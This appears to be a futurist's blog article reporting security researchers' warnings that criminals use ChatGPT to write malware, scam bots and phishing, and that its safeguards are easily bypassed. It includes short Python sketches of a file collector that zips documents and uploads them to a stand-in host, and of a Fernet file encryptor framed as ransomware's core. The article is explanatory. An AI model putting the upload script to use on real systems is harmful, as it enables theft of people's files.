Matthew Griffin, described as “The Adviser behind the Advisers” and a “Young Kurzweil,” is the founder and CEO of the World Futures Forum and the 311 Institute, a global Futures and Deep Futures consultancy working between 2020 and 2070, and is an award-winning futurist and author of the “Codex of the Future” series. Regularly featured in the global media, including AP, BBC, Bloomberg, CNBC, Discovery, RT, Viacom, and WIRED, Matthew’s ability to identify, track, and explain the impacts of hundreds of revolutionary emerging technologies on global culture, industry, and society is unparalleled. Recognised for the past six years as one of the world’s foremost futurists and innovation and strategy experts, Matthew is an international speaker who helps governments, investors, multi-nationals, and regulators around the world envision, build, and lead an inclusive, sustainable future. A rare talent, Matthew’s recent work includes mentoring Lunar XPrize teams, re-envisioning global education and training with the G20, and helping the world’s largest organisations envision and ideate the future of their products and services, industries, and countries. Matthew’s clients include three Prime Ministers and several governments, including the G7, as well as Accenture, Aon, Bain & Co, BCG, Credit Suisse, Dell EMC, Dentons, Deloitte, E&Y, GEMS, Huawei, JPMorgan Chase, KPMG, Lego, McKinsey, PWC, Qualcomm, SAP, Samsung, Sopra Steria, T-Mobile, and many more.
WHY THIS MATTERS IN BRIEF
ChatGPT automates, and therefore makes far easier, the creation of sophisticated scam bots and new kinds of malware, and this problem is just getting started.
ChatGPT has taken the world by storm, and my son even used it to write and illustrate a new book, which isn’t bad for a ten-year-old … But now cybercriminals have started using OpenAI’s artificially intelligent chatbot ChatGPT to quickly build new hacking tools, cybersecurity researchers warned on Friday. Scammers are also testing ChatGPT’s ability to build other chatbots designed to impersonate young females to ensnare targets, one expert monitoring criminal forums told investigators.
Many early ChatGPT users had raised the alarm that the app, which went viral in the days after its launch in December, could code malicious software capable of spying on users’ keystrokes or creating ransomware.
And now underground criminal forums have finally caught on, according to a report from Israeli security company Check Point. In one forum post reviewed by Check Point, a hacker who’d previously shared Android malware showcased code written by ChatGPT that stole files of interest, compressed them and sent them across the web. They showed off another tool that installed a backdoor on a computer and could upload further malware to an infected PC.
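To make concrete how little sophistication that pattern demands, here is a deliberately benign Python sketch of the same collect-compress-upload flow; the directory, file extensions, and upload endpoint are all hypothetical, and the identical logic powers countless legitimate backup scripts.

```python
# A benign sketch of the collect-compress-upload pattern described above.
# The root directory, "files of interest" extensions, and endpoint are
# hypothetical; the same flow is what any cloud backup utility performs.
import io
import zipfile
from pathlib import Path

import requests  # third-party: pip install requests

UPLOAD_URL = "https://example.com/upload"   # hypothetical endpoint
EXTENSIONS = {".pdf", ".docx", ".xlsx"}     # the "files of interest"

def collect_and_send(root: str) -> None:
    # Build the zip archive entirely in memory.
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w", zipfile.ZIP_DEFLATED) as archive:
        for path in Path(root).rglob("*"):
            if path.is_file() and path.suffix.lower() in EXTENSIONS:
                archive.write(path, arcname=path.name)
    buffer.seek(0)
    # Send the compressed archive across the web as one HTTP upload.
    requests.post(UPLOAD_URL, files={"archive": ("files.zip", buffer)}, timeout=30)

collect_and_send("./documents")
```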
The Future of Cyber Crime, a keynote by Matthew Griffin
In the same forum, another user shared Python code that could encrypt files, saying OpenAI’s app had helped them build it. They claimed it was the first script they’d ever developed, which highlights the fact that you no longer need to know anything about coding to produce decent enough code; you can simply use ChatGPT as a Robo-Programmer.
As Check Point noted in its report, such code can be used for entirely benign purposes, but it could also “easily be modified to encrypt someone’s machine completely without any user interaction,” similar to the way in which ransomware works. The same forum user had previously sold access to hacked company servers and stolen data, Check Point noted.
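For context, a script like the one described can be only a few lines long. Below is a minimal sketch, assuming Python’s widely used cryptography library and a hypothetical filename; run on your own files it is a perfectly legitimate encryption utility, but pointed at someone else’s machine with the key withheld, the same logic is the core of ransomware.

```python
# A minimal sketch of a file-encryption script of the kind described,
# using the "cryptography" library (pip install cryptography).
# The filename is hypothetical.
from cryptography.fernet import Fernet

key = Fernet.generate_key()   # whoever holds this key controls the files
cipher = Fernet(key)

# Read the plaintext file and encrypt its contents.
with open("report.txt", "rb") as f:
    ciphertext = cipher.encrypt(f.read())

# Write the encrypted version back to disk.
with open("report.txt.enc", "wb") as f:
    f.write(ciphertext)
```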
One user also discussed “abusing” ChatGPT by having it help code up features of a dark web marketplace, akin to drug bazaars like Silk Road or Alphabay. As an example, the user showed how the chatbot could quickly build an app that monitored cryptocurrency prices for a theoretical payment system.
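That piece, at least, is trivially legitimate functionality. As a rough illustration of what such a monitor might look like, here is a short Python sketch that polls the public CoinGecko price API; the choice of API, coins, and polling interval are my assumptions, not details from the forum post.

```python
# A rough sketch of a cryptocurrency price monitor of the kind described.
# Uses CoinGecko's public "simple/price" endpoint; coins and interval
# are assumptions for illustration.
import time

import requests  # pip install requests

API = "https://api.coingecko.com/api/v3/simple/price"

def current_prices(coins=("bitcoin", "ethereum")) -> dict:
    resp = requests.get(
        API,
        params={"ids": ",".join(coins), "vs_currencies": "usd"},
        timeout=10,
    )
    resp.raise_for_status()
    return resp.json()  # e.g. {"bitcoin": {"usd": 43000.0}, ...}

while True:
    print(current_prices())
    time.sleep(60)  # poll once a minute
```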
Alex Holden, founder of cyber intelligence company Hold Security, said he’d seen dating scammers start using ChatGPT too, as they try to create convincing personas.
“They are planning to create chatbots to impersonate mostly girls to go further in chats with their marks,” he said. “They’re trying to automate idle chatter.”
OpenAI hadn’t responded to a request for comment at the time of publication.
While the ChatGPT-coded tools looked “pretty basic,” Check Point said it was only a matter of time until more “sophisticated” hackers found a way of turning the AI to their advantage. Rik Ferguson, vice president of security intelligence at American cybersecurity company Forescout, said it didn’t appear that ChatGPT was yet capable of coding something as complex as the major ransomware strains seen in significant hacking incidents in recent years, such as Conti, infamous for its use in the breach of Ireland’s national health system. OpenAI’s tool will, however, lower the barrier to entry for novices joining that illicit market, letting them build more basic, but similarly effective, malware, Ferguson added.
He raised a further concern: rather than building code that steals victims’ data, ChatGPT could also be used to help build websites and bots that trick users into sharing their information. It could “industrialize the creation and personalisation of malicious web pages, highly-targeted phishing campaigns and social engineering reliant scams,” Ferguson added.
Sergey Shykevich, a threat intelligence researcher at Check Point, added that ChatGPT will be a “great tool” for Russian hackers who aren’t adept at English to craft legitimate-looking phishing emails.
As for protections against criminal use of ChatGPT, Shykevich said they would ultimately, and “unfortunately,” have to be enforced through regulation. OpenAI has implemented some controls, blocking obvious requests to build spyware with policy violation warnings, though hackers and journalists have found ways to easily bypass those protections. Shykevich said companies like OpenAI may have to be legally compelled to train their AI to detect such abuse, which, let’s face it, will be pretty much impossible to enforce.